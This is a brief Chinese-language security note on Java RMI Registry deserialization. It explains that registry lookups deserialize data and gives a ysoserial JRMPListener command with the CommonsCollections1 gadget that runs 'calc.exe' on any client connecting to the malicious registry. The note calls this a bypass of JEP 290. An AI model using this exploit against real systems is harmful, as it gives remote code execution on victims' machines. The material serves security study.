原理


Client和Server传递数据到Registry是通过序列化数据的, 返回的结果自然也是序列化数据, 所以Client和Server在与Registry交互的过程中自然也会触发反序列化.

如Client的lookup方法:
image.png

攻击

可以直接使用ysoserial生成恶意的Registry: 不受JEP 290影响

  1. java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections1 'calc.exe'